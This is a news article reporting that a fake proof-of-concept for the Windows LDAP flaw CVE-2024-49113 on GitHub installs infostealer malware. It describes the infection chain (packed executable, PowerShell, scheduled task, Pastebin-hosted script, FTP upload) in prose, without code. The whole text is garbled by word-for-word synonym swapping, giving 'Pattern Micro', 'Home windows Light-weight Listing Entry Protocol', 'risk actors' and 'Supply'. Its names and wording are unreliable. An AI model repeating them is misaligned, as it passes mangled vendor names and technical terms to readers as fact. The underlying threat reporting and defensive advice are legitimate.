A misleading proof-of-concept (PoC) exploit for CVE-2024-49113 (aka “LDAPNightmare”) on GitHub infects customers with infostealer malware that exfiltrates delicate knowledge to an exterior FTP server.
The tactic is not novel, as there have been a number of documented circumstances of malicious instruments disguised as PoC exploits on GitHub.
Nevertheless, this case, found by Pattern Micro, highlights that risk actors proceed to make use of the tactic to trick unsuspecting customers into infecting themselves with malware.
Supply: Pattern Micro
A misleading exploit
Pattern Micro studies that the malicious GitHub repository incorporates a challenge that seems to have been forked from SafeBreach Labs’ reputable PoC for CVE-2024-49113, revealed on January 1, 2025.
The flaw is without doubt one of the two impacting Home windows Light-weight Listing Entry Protocol (LDAP), which Microsoft fastened in its December 2024 Patch Tuesday, with the opposite being a vital distant code execution (RCE) downside tracked as CVE-2024-49112.
SafeBreach’s preliminary weblog publish in regards to the PoC wrongfully talked about CVE-2024-49112, whereas their PoC was for CVE-2024-49113, which is a decrease severity denial of service vulnerability.
This error, even when corrected later, created larger curiosity and buzz round LDAPNightmare and its potential for assaults, which might be what the risk actors tried to reap the benefits of.
Customers downloading the PoC from the malicious repository will get a UPX-packed executable ‘poc.exe’ which, upon execution, drops a PowerShell script within the sufferer’s %Temp% folder.
The script creates a scheduled job on the compromised system, which executes an encoded script that fetches a 3rd script from Pastebin.
This ultimate payload collects laptop info, course of lists, listing lists, IP handle, and community adapter info, in addition to put in updates, and uploads them in ZIP archive type to an exterior FTP server utilizing hardcoded credentials.
Supply: Pattern Micro
An inventory of the symptoms of compromise for this assault will be discovered right here.
GitHub customers sourcing public exploits for analysis or testing must train warning and ideally solely belief cybersecurity corporations and researchers with a very good status.
Risk actors have tried to impersonate well-known safety researchers prior to now, so validating repository authenticity can also be essential.
If potential, evaluate the code earlier than executing it in your system, add binaries to VirusTotal, and skip something that seems obfuscated.